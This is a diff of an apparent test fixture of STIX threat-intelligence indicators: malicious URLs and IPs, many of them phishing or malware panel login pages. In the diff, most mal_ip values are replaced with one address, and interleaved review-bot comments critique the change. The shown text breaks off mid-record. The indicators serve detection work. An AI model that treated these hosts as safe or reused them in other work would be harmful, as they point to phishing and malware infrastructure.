 {"created":"2020-02-20T05:18:20.205Z","description":"TS ID: 55330801629; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime","id":"indicator--db19cb4e-25ad-46d3-a944-6e53f62d230c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-92"],"modified":"2020-02-20T05:18:20.205Z","name":"mal_url: http://liweff.eu/vla/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://liweff.eu/vla/panel/admin.php']","type":"indicator","valid_from":"2020-02-20T05:18:20.205Z"}
 {"created":"2020-02-20T05:18:20.412Z","description":"TS ID: 55328307485; iType: mal_url; State: active; Org: YHC Corporation; Source: CyberCrime","id":"indicator--438a519a-17ed-422b-a21d-0262b4b2fc0e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-20T05:18:20.412Z","name":"mal_url: 
http://brokenhead.xyz/Work2/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://brokenhead.xyz/Work2/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T05:18:20.412Z"}
 {"created":"2020-02-20T05:18:22.703Z","description":"TS ID: 55330801601; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime","id":"indicator--7279d49d-39e4-42d1-8fb7-14ddb56d67d7","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-20T05:18:22.703Z","name":"mal_url: http://castmart.ga/~zadmin/lmark/pop/uMc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://castmart.ga/~zadmin/lmark/pop/uMc.php']","type":"indicator","valid_from":"2020-02-20T05:18:22.703Z"}
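Review bot: Every rewritten record in this hunk — the `mal_ip` indicators and the host part of the `mal_url` indicators — now carries the single address 89.160.20.156 while keeping its original `id`, TS ID and `Org:` attribution (for example `Org: MoreneHost` and `Org: Petersburg Internet Network ltd.` now sit next to the same IP), so the fixture no longer contains any distinct public IP value. If the pipeline under test, or its companion expected-output file, keys or deduplicates on the address (not visible from the diff), that path is no longer exercised, and the expected results presumably have to be regenerated together with this change. Spreading the records across several addresses from the supported test subset, rather than collapsing them onto one, would keep the per-indicator variety the original data had; the `@@ -484,7 +484,7 @@` hunk that follows makes the same single-address substitution and runs past this chunk.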
@@ -484,7 +484,7 @@
 {"created":"2020-02-20T05:24:01.214Z","description":"TS ID: 55330801569; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--434af7fc-410e-404d-8c8c-8875f92cb0c0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-02-20T05:24:01.214Z","name":"mal_url: http://f0402912.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0402912.xsph.ru/login']","type":"indicator","valid_from":"2020-02-20T05:24:01.214Z"}
 {"created":"2020-02-20T05:24:21.239Z","description":"TS ID: 55330801567; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--3ea0e805-8fa3-40ce-84e5-bf39318f35a6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-64"],"modified":"2020-02-20T05:24:21.239Z","name":"mal_url: http://f0404052.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0404052.xsph.ru/login']","type":"indicator","valid_from":"2020-02-20T05:24:21.239Z"}
 {"created":"2020-02-20T05:24:33.205Z","description":"TS ID: 55330801581; iType: mal_url; State: active; Org: Media Antar Nusa PT.; Source: CyberCrime","id":"indicator--b9cccc62-550f-4f5b-bb32-f580c23fe382","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-20T05:24:33.205Z","name":"mal_url: http://sariincofood.co.id/oxo/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://sariincofood.co.id/oxo/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T05:24:33.205Z"}
-{"created":"2020-02-20T05:24:35.843Z","description":"TS ID: 55330801559; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--314ecb7a-db3a-4a64-9c0c-1361891c26c3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-59"],"modified":"2020-02-20T05:24:35.843Z","name":"mal_ip: 193.32.188.146","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '193.32.188.146']","type":"indicator","valid_from":"2020-02-20T05:24:35.843Z"}
+{"created":"2020-02-20T05:24:35.843Z","description":"TS ID: 55330801559; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--314ecb7a-db3a-4a64-9c0c-1361891c26c3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-59"],"modified":"2020-02-20T05:24:35.843Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-20T05:24:35.843Z"}
 {"created":"2020-02-20T05:24:47.629Z","description":"TS ID: 55330801610; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime","id":"indicator--d594d88f-2e74-4539-99a3-7fc7ae29ac7f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-20T05:24:47.629Z","name":"mal_url: http://castmart.ga/~zadmin/lmark/aps/uMc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://castmart.ga/~zadmin/lmark/aps/uMc.php']","type":"indicator","valid_from":"2020-02-20T05:24:47.629Z"}
 {"created":"2020-02-20T05:24:47.645Z","description":"TS ID: 55330801575; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime","id":"indicator--d20e7f50-caac-4054-b816-6f4a9a9283b9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-02-20T05:24:47.645Z","name":"mal_url: http://thefieldagent.net/ys/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://thefieldagent.net/ys/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T05:24:47.645Z"}
 {"created":"2020-02-20T05:25:26.502Z","description":"TS ID: 55328307491; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--fb3209c5-4de8-4554-9bb4-ed8cc2b19915","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-80"],"modified":"2020-02-20T05:25:26.502Z","name":"mal_url: http://instaboom-hello.site/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://instaboom-hello.site/login.php']","type":"indicator","valid_from":"2020-02-20T05:25:26.502Z"}
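Review bot: Every rewritten mal_ip indicator in this hunk and in the ones at `@@ -497` and `@@ -506` now carries the same value `89.160.20.156` in both `name` and `pattern` under a distinct `id`, so if the pipeline or the expected-output comparison keys on the extracted address (for deduplication or an indicator IP field), the fixture no longer exercises distinct-address handling; the matching expected-output file is not in this view and presumably has to be regenerated in the same change. If the goal is to purge all public IPs from the fixture, the `@@ -506` hunk still leaves URL hosts `51.83.200.179` and `67.215.224.144` on context lines while other URL hosts in that hunk were rewritten; that hunk runs past the visible lines, so later records could not be checked. The `name`/`pattern` pairs that were changed are updated consistently with each other.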
@@ -497,7 +497,7 @@
 {"created":"2020-02-21T02:52:28.296Z","description":"TS ID: 55333174457; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--ec1f4e5c-0878-4dcf-9141-4a83b8abeb2c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-21T02:52:28.296Z","name":"mal_url: http://groysman.club/host/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://groysman.club/host/admin.php']","type":"indicator","valid_from":"2020-02-21T02:52:28.296Z"}
 {"created":"2020-02-21T02:52:31.697Z","description":"TS ID: 55333174438; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--40502e97-56ae-4194-81d7-fc08ebff68c1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-21T02:52:31.697Z","name":"mal_url: http://nortonlilly.info/ace/ts/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nortonlilly.info/ace/ts/login.php']","type":"indicator","valid_from":"2020-02-21T02:52:31.697Z"}
 {"created":"2020-02-21T02:52:33.704Z","description":"TS ID: 55333174439; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--d9ed2a5f-0f87-4d87-adec-7a925fc848e4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-21T02:52:33.704Z","name":"mal_url: http://zdwallcoveing.com/cream/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://zdwallcoveing.com/cream/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-21T02:52:33.704Z"}
-{"created":"2020-02-21T02:52:34.992Z","description":"TS ID: 55333174446; iType: mal_ip; State: active; Org: Aksinet Ltd.; Source: CyberCrime","id":"indicator--097b92f4-6865-49db-8e59-2a89df364749","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-77"],"modified":"2020-02-21T02:52:34.992Z","name":"mal_ip: 84.38.180.229","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '84.38.180.229']","type":"indicator","valid_from":"2020-02-21T02:52:34.992Z"}
+{"created":"2020-02-21T02:52:34.992Z","description":"TS ID: 55333174446; iType: mal_ip; State: active; Org: Aksinet Ltd.; Source: CyberCrime","id":"indicator--097b92f4-6865-49db-8e59-2a89df364749","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-77"],"modified":"2020-02-21T02:52:34.992Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-21T02:52:34.992Z"}
 {"created":"2020-02-21T02:52:35.038Z","description":"TS ID: 55333174442; iType: mal_url; State: active; Org: LeaseWeb Netherlands B.V.; Source: CyberCrime","id":"indicator--03ea9edc-6654-4287-b452-988c85380295","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-60"],"modified":"2020-02-21T02:52:35.038Z","name":"mal_url: http://jusper.zzz.com.ua/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://jusper.zzz.com.ua/panel/admin.php']","type":"indicator","valid_from":"2020-02-21T02:52:35.038Z"}
 {"created":"2020-02-21T02:52:38.593Z","description":"TS ID: 55333174440; iType: mal_url; State: active; Org: LeaseWeb Netherlands B.V.; Source: CyberCrime","id":"indicator--99f64515-7513-4764-b278-987c5df8484b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-69"],"modified":"2020-02-21T02:52:38.593Z","name":"mal_url: http://azur.kl.com.ua/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://azur.kl.com.ua/panel/admin.php']","type":"indicator","valid_from":"2020-02-21T02:52:38.593Z"}
 {"created":"2020-02-21T02:53:25.758Z","description":"TS ID: 55333174450; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime","id":"indicator--afdd7c21-d8c6-419e-84be-5c8b2ce1a829","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-21T02:53:25.758Z","name":"mal_url: http://d98527ix.beget.tech/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://d98527ix.beget.tech/login']","type":"indicator","valid_from":"2020-02-21T02:53:25.758Z"}
@@ -506,45 +506,45 @@ {"created":"2020-02-21T02:53:40.48Z","description":"TS ID: 55333174451; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--51994ab0-1f97-4bcb-9f24-9fcd3d2364aa","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-21T02:53:40.48Z","name":"mal_url: http://zdwallcoveing.com/clock/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://zdwallcoveing.com/clock/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-21T02:53:40.48Z"} {"created":"2020-02-21T02:53:42.327Z","description":"TS ID: 55333174456; iType: mal_url; State: active; Org: WebHS; Source: CyberCrime","id":"indicator--c9d733d6-25c7-4306-9246-c08194e3073a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-21T02:53:42.327Z","name":"mal_url: http://livdecor.pt/ali/Panel/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://livdecor.pt/ali/Panel/panel/admin.php']","type":"indicator","valid_from":"2020-02-21T02:53:42.327Z"} {"created":"2020-02-21T02:53:58.967Z","description":"TS ID: 55333174444; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime","id":"indicator--1322e66c-185d-4f46-80d4-d5751722d4cf","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-21T02:53:58.967Z","name":"mal_url: http://liweff.eu/kp/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://liweff.eu/kp/login.php']","type":"indicator","valid_from":"2020-02-21T02:53:58.967Z"} -{"created":"2020-02-21T02:54:44.049Z","description":"TS ID: 55333174436; iType: mal_url; State: active; Org: 1&1 Internet AG; Source: 
CyberCrime","id":"indicator--733d93ce-6ce8-4272-b564-b09818dbdbbb","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-20"],"modified":"2020-02-21T02:54:44.049Z","name":"mal_url: http://82.165.18.207/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://82.165.18.207/panel/admin.php']","type":"indicator","valid_from":"2020-02-21T02:54:44.049Z"} -{"created":"2020-02-21T02:54:44.075Z","description":"TS ID: 55333174435; iType: mal_ip; State: active; Org: WebHS; Source: CyberCrime","id":"indicator--fc0b39d5-d097-4e61-a4cd-970929467bad","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-50"],"modified":"2020-02-21T02:54:44.075Z","name":"mal_ip: 185.90.59.42","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '185.90.59.42']","type":"indicator","valid_from":"2020-02-21T02:54:44.075Z"} +{"created":"2020-02-21T02:54:44.049Z","description":"TS ID: 55333174436; iType: mal_url; State: active; Org: 1&1 Internet AG; Source: CyberCrime","id":"indicator--733d93ce-6ce8-4272-b564-b09818dbdbbb","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-20"],"modified":"2020-02-21T02:54:44.049Z","name":"mal_url: http://89.160.20.156/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/panel/admin.php']","type":"indicator","valid_from":"2020-02-21T02:54:44.049Z"} +{"created":"2020-02-21T02:54:44.075Z","description":"TS ID: 55333174435; iType: mal_ip; State: active; Org: WebHS; Source: CyberCrime","id":"indicator--fc0b39d5-d097-4e61-a4cd-970929467bad","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-50"],"modified":"2020-02-21T02:54:44.075Z","name":"mal_ip: 
89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-21T02:54:44.075Z"} {"created":"2020-02-22T02:52:52.6Z","description":"TS ID: 55335562485; iType: mal_url; State: active; Org: PDR; Source: CyberCrime","id":"indicator--92dd4ff2-7072-4262-b47d-b04cae8480e1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-52"],"modified":"2020-02-22T02:52:52.6Z","name":"mal_url: http://missingandfound.com.my/urch/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://missingandfound.com.my/urch/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-22T02:52:52.6Z"} {"created":"2020-02-22T02:52:53.322Z","description":"TS ID: 55335562462; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--122f6e46-781f-4d00-8247-6cf4047b0c9f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-22T02:52:53.322Z","name":"mal_url: http://corpcougar.com/bin/pa/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://corpcougar.com/bin/pa/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-22T02:52:53.322Z"} {"created":"2020-02-22T02:52:53.756Z","description":"TS ID: 55335562495; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime","id":"indicator--d5b42516-dfa2-499d-bc2b-c5c10617e7c9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-02-22T02:52:53.756Z","name":"mal_url: http://allenservice.ga/~zadmin/lmark/frega/uMc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 
'http://allenservice.ga/~zadmin/lmark/frega/uMc.php']","type":"indicator","valid_from":"2020-02-22T02:52:53.756Z"} {"created":"2020-02-22T02:52:53.779Z","description":"TS ID: 55335562482; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--0668db3a-adb5-4e2e-b8f2-18e3870e2d7c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-22T02:52:53.779Z","name":"mal_url: http://rotan.tech/explore/acm/balldrop/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://rotan.tech/explore/acm/balldrop/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-22T02:52:53.779Z"} -{"created":"2020-02-22T02:52:59.853Z","description":"TS ID: 55335562401; iType: mal_url; State: active; Org: BelCloud Hosting Corporation; Source: CyberCrime","id":"indicator--679fd604-82cb-47cd-a968-e87e9cca7fac","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-22T02:52:59.853Z","name":"mal_url: http://86.106.93.103/mpdu/index.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://86.106.93.103/mpdu/index.php']","type":"indicator","valid_from":"2020-02-22T02:52:59.853Z"} -{"created":"2020-02-22T02:53:10.018Z","description":"TS ID: 55335562492; iType: mal_ip; State: active; Org: McHost.Ru; Source: CyberCrime","id":"indicator--cdbffa12-c6c9-4723-807f-46b9672a23a2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-77"],"modified":"2020-02-22T02:53:10.018Z","name":"mal_ip: 95.142.44.87","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '95.142.44.87']","type":"indicator","valid_from":"2020-02-22T02:53:10.018Z"} +{"created":"2020-02-22T02:52:59.853Z","description":"TS ID: 55335562401; 
iType: mal_url; State: active; Org: BelCloud Hosting Corporation; Source: CyberCrime","id":"indicator--679fd604-82cb-47cd-a968-e87e9cca7fac","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-22T02:52:59.853Z","name":"mal_url: http://89.160.20.156/mpdu/index.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/mpdu/index.php']","type":"indicator","valid_from":"2020-02-22T02:52:59.853Z"} +{"created":"2020-02-22T02:53:10.018Z","description":"TS ID: 55335562492; iType: mal_ip; State: active; Org: McHost.Ru; Source: CyberCrime","id":"indicator--cdbffa12-c6c9-4723-807f-46b9672a23a2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-77"],"modified":"2020-02-22T02:53:10.018Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-22T02:53:10.018Z"} {"created":"2020-02-22T02:53:11.62Z","description":"TS ID: 55335562491; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--2218c7b6-3e94-4885-9a70-1f724d8453cc","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-22T02:53:11.62Z","name":"mal_url: http://epperfums.com/drunk/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://epperfums.com/drunk/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-22T02:53:11.62Z"} {"created":"2020-02-22T02:53:34.685Z","description":"TS ID: 55335562511; iType: mal_url; State: active; Org: T-Mobile Czech Republic; Source: 
CyberCrime","id":"indicator--773fabfe-63b5-4681-8189-4dffad1747fc","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-46"],"modified":"2020-02-22T02:53:34.685Z","name":"mal_url: http://ccilfov.ro/css/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ccilfov.ro/css/panel/admin.php']","type":"indicator","valid_from":"2020-02-22T02:53:34.685Z"} -{"created":"2020-02-22T02:53:34.733Z","description":"TS ID: 55335562506; iType: mal_ip; State: active; Org: ChunkHost; Source: CyberCrime","id":"indicator--5e32213f-5daa-4181-a108-0fc58482adcb","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-22T02:53:34.733Z","name":"mal_ip: 66.172.27.221","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '66.172.27.221']","type":"indicator","valid_from":"2020-02-22T02:53:34.733Z"} +{"created":"2020-02-22T02:53:34.733Z","description":"TS ID: 55335562506; iType: mal_ip; State: active; Org: ChunkHost; Source: CyberCrime","id":"indicator--5e32213f-5daa-4181-a108-0fc58482adcb","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-22T02:53:34.733Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-22T02:53:34.733Z"} {"created":"2020-02-22T02:53:34.767Z","description":"TS ID: 55335562468; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--b07ae083-b56c-48b0-bfdb-6cf786978ce8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-22T02:53:34.767Z","name":"mal_url: 
http://nortonlilly.info/zeya/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nortonlilly.info/zeya/login.php']","type":"indicator","valid_from":"2020-02-22T02:53:34.767Z"} {"created":"2020-02-22T02:53:36.179Z","description":"TS ID: 55335562472; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime","id":"indicator--42e0fb49-dd09-4979-a4d0-ff310d14acf8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-02-22T02:53:36.179Z","name":"mal_url: http://allenservice.ga/~zadmin/lmark/adaba/uMc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://allenservice.ga/~zadmin/lmark/adaba/uMc.php']","type":"indicator","valid_from":"2020-02-22T02:53:36.179Z"} {"created":"2020-02-22T02:53:45.219Z","description":"TS ID: 55335562429; iType: mal_url; State: active; Org: OVH SAS; Source: CyberCrime","id":"indicator--8d2d349a-763b-406b-ba8c-8ba684058028","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-73"],"modified":"2020-02-22T02:53:45.219Z","name":"mal_url: http://51.83.200.179/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://51.83.200.179/panel/admin.php']","type":"indicator","valid_from":"2020-02-22T02:53:45.219Z"} {"created":"2020-02-22T02:53:56.922Z","description":"TS ID: 55335562488; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--965a2554-cc08-488c-8d81-a29e8402eec1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-92"],"modified":"2020-02-22T02:53:56.922Z","name":"mal_url: http://lighteniger.tech/hntspeed/mansft/paydy/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 
'http://lighteniger.tech/hntspeed/mansft/paydy/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-22T02:53:56.922Z"} {"created":"2020-02-22T02:54:18.93Z","description":"TS ID: 55335562502; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--e75aa726-cbb0-486f-ac25-947fc76fb5de","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-22T02:54:18.93Z","name":"mal_url: http://paperblank.best/gHL6qufBKIulnp11/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://paperblank.best/gHL6qufBKIulnp11/login.php']","type":"indicator","valid_from":"2020-02-22T02:54:18.93Z"} -{"created":"2020-02-22T02:54:18.975Z","description":"TS ID: 55335562470; iType: mal_ip; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime","id":"indicator--9f6d9425-fc79-4493-8f95-81ac2a7ae188","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-56"],"modified":"2020-02-22T02:54:18.975Z","name":"mal_ip: 8.208.3.169","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '8.208.3.169']","type":"indicator","valid_from":"2020-02-22T02:54:18.975Z"} +{"created":"2020-02-22T02:54:18.975Z","description":"TS ID: 55335562470; iType: mal_ip; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime","id":"indicator--9f6d9425-fc79-4493-8f95-81ac2a7ae188","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-56"],"modified":"2020-02-22T02:54:18.975Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-22T02:54:18.975Z"} {"created":"2020-02-22T02:54:27.432Z","description":"TS ID: 55335562494; iType: 
mal_url; State: active; Org: Alicloud-us; Source: CyberCrime","id":"indicator--1333f7e6-3af0-4aea-b798-a54f03d68ac5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-02-22T02:54:27.432Z","name":"mal_url: http://allenservice.ga/~zadmin/lmark/frega2/uMc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://allenservice.ga/~zadmin/lmark/frega2/uMc.php']","type":"indicator","valid_from":"2020-02-22T02:54:27.432Z"} {"created":"2020-02-22T02:54:27.479Z","description":"TS ID: 55335562474; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime","id":"indicator--f4e076ed-6393-49d5-adc2-cbe730ff48db","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-22T02:54:27.479Z","name":"mal_url: http://castmart.ga/~zadmin/beta/herm/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://castmart.ga/~zadmin/beta/herm/login.php']","type":"indicator","valid_from":"2020-02-22T02:54:27.479Z"} {"created":"2020-02-22T02:54:29.634Z","description":"TS ID: 55335562505; iType: mal_url; State: active; Org: ChunkHost; Source: 